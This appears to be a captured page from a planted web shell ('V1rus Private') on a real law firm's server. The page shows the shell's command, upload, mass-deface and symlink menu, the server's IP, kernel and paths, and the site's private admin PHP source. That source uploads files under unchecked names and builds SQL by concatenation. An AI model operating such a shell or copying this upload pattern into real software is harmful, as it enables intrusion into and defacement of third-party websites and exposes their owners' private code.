V1rus Private
User / IP
:
216.73.217.26
Host / Server
:
103.138.189.202 / chaitanyalaw.com
System
:
Linux s1325.sgp1.mysecurecloudhost.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC 2023 x86_64
Cmd
|
Upload
|
Mass Deface
|
Create
|
Sym
:
/
home
/
chaitany
/
public_html
/
CMS
/
lawfiles
/
Viewing: managelawfile.php
<?php include_once("../layouts/header.php"); include_once("../layouts/validate.php"); if (isset($_POST['submit'])) { function create($conn, $data = []) { $title = validate_script(mysqli_real_escape_string($conn, $data['title'])); $name = validate_script(mysqli_real_escape_string($conn, $data['name'])); $category = validate_script(mysqli_real_escape_string($conn, $data['category'])); $isValidTitle = validate_title($title); $isValidName = validate_name($name); $file_name = $_FILES['file']['name']; if ($isValidName && $isValidTitle && $file_name != "") { move_uploaded_file($_FILES['file']['tmp_name'], "files/" . $file_name); $date = date('y-m-d'); $sql = "INSERT INTO lawfile(title,files,category,cdate,name) VALUES('$title','$file_name','$category','$date','$name')"; $res = mysqli_query($conn, $sql); if ($res) { $_SESSION['statuslaw'] = "Data Added Sucessfully"; } header("location: showlawfile.php"); } else { $_SESSION['statuslawError'] = "Sorry, Something went wrong, data can not be added into the database."; header("location: showlawfile.php"); } } create($conn, $_POST); } if (isset($_GET['editid'])) { $id = mysqli_real_escape_string($conn,$_GET['editid']); function edit($id) { header("location: " . ADMINURL . "lawfiles/editlawfile.php?updateid=$id"); } edit($id); } function previousdata($conn, $id) { $sql = "SELECT * FROM lawfile WHERE id='$id'"; $res = mysqli_query($conn, $sql); $numrows = mysqli_num_rows($res); if ($numrows > 0) { $row = mysqli_fetch_assoc($res); return $row; } } function update($conn, $id, $data = []) { $title = validate_script(mysqli_real_escape_string($conn, $data['title'])); $name = validate_script(mysqli_real_escape_string($conn, $data['name'])); $category = validate_script(mysqli_real_escape_string($conn, $data['category'])); $isValidTitle = validate_title($title); $isValidName = validate_name($name); $file_name = $_FILES['file']['name']; // $file_name != "" ? $file_name = $_FILES['file']['name']: ""; $path = "files/"; $pre_file = previousdata($conn, $id)['files']; var_dump($file_name); if($file_name != "") move_uploaded_file($_FILES['file']['tmp_name'], $path.$file_name); $fileupload = ($file_name == "" && file_exists($path . $pre_file)) ? ($file_name = $pre_file) || true : false; if (!$fileupload && $file_name == "") $_SESSION['filesError'] = "Please select a files."; if (($isValidName && $isValidTitle && $file_name != "") || ($isValidName && $isValidTitle && $fileupload)) { $udate = date('y-m-d'); $sql = " UPDATE lawfile SET title = '$title', files = '$file_name', category = '$category', udate = '$udate', name='$name' WHERE id = '$id'"; $res = mysqli_query($conn, $sql); if ($res) { $_SESSION['statuslaw'] = "Data Updated Sucessfully"; } $path = "location.href='" . ADMINURL . "lawfiles/showlawfile.php'"; echo "<script>$path</script>"; } else { $_SESSION['statuslawError'] = "Sorry, Something went wrong, data can not be added into the database."; $path = "location.href='" . ADMINURL . "lawfiles/showlawfile.php'"; echo "<script>$path</script>"; } } if (isset($_POST['delete_btn'])) { $id = mysqli_real_escape_string($conn, $_POST['deleteid']); $sql = "DELETE FROM lawfile WHERE id='$id'"; $res = mysqli_query($conn, $sql); if ($res) { // $_SESSION['status'] = "Data deleted Sucessfully"; echo 6; // $path = "location.href='" . ADMINURL . "lawfiles/showlawfile.php'"; // echo "<script>$path</script>"; } else { echo 5; } }
Coded With 💗 by
HanzOFC
